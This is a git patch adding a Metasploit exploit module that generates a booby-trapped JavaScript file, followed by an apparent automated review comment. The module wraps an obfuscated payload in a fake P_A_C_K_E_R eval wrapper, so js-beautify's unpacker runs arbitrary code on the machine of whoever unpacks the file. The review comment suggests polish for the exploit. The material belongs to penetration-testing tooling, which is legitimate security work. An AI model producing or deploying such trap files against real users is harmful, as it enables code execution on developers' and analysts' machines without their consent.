From f8609ab0ba821dc3fa65fb669aa899d66d2b2ef7 Mon Sep 17 00:00:00 2001
From: joev
Date: Wed, 18 Feb 2015 11:26:45 -0600
Subject: [PATCH] Add file format exploit for injecting code into unpackers.
---
.../fileformat/js_unpacker_eval_injection.rb | 46 +++++++++++++++++++
1 file changed, 46 insertions(+)
create mode 100644 modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb
diff --git a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb
new file mode 100644
index 0000000000..a608a0f6e8
--- /dev/null
+++ b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb
@@ -0,0 +1,46 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/jsobfu'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::JSObfu
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Javascript injection for eval-based unpackers',
+ 'Description' => %q{
+ This module generates a Javascript file that executes arbitrary code
+ when an eval-based unpacker is run on it. Works against js-beautify's
+ P_A_C_K_E_R unpacker.
+ },
+ 'Author' => [ 'joev' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ],
+ 'Platform' => 'nodejs',
+ 'Arch' => ARCH_NODEJS,
+ 'Privileged' => false,
+ 'Targets' => [['Automatic', {}]],
+ 'DefaultTarget' => 0))
+
+ register_options([
+ OptString.new('FILENAME', [true, 'The file name.', 'msf.js']),
+ OptString.new('CUSTOM_JS', [false, 'Custom Javascript payload.'])
+ ], self.class)
+ end
+
+ def exploit
+ p = js_obfuscate(datastore['CUSTOM_JS'] || payload.encoded);
+ print_status("Creating '#{datastore['FILENAME']}' file...")
+ file_create("eval(function(p,a,c,k,e,r){}((function(){ #{p} })(),''.split('|'),0,{}))")
+ end
+
+end
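Review bot: The `'References'` array in `initialize` is left empty, and `'Description'` names js-beautify's P_A_C_K_E_R unpacker without an affected or fixed version, so a reader cannot tie the module to an advisory or tell whether an installed unpacker is exposed. Before merge, fill it with something like `[ 'URL', '<upstream advisory or fix commit URL>' ]` (placeholder), add a `'DisclosureDate'`, and state the affected version range in the description. In `exploit`, the local `p` shadows `Kernel#p` and the line ends in a stray semicolon; `js = js_obfuscate(datastore['CUSTOM_JS'] || payload.encoded)` reads more cleanly. An empty-string `CUSTOM_JS` is truthy in Ruby, so the `||` fallback to `payload.encoded` would presumably not fire in that case; confirm how the datastore represents an unset option.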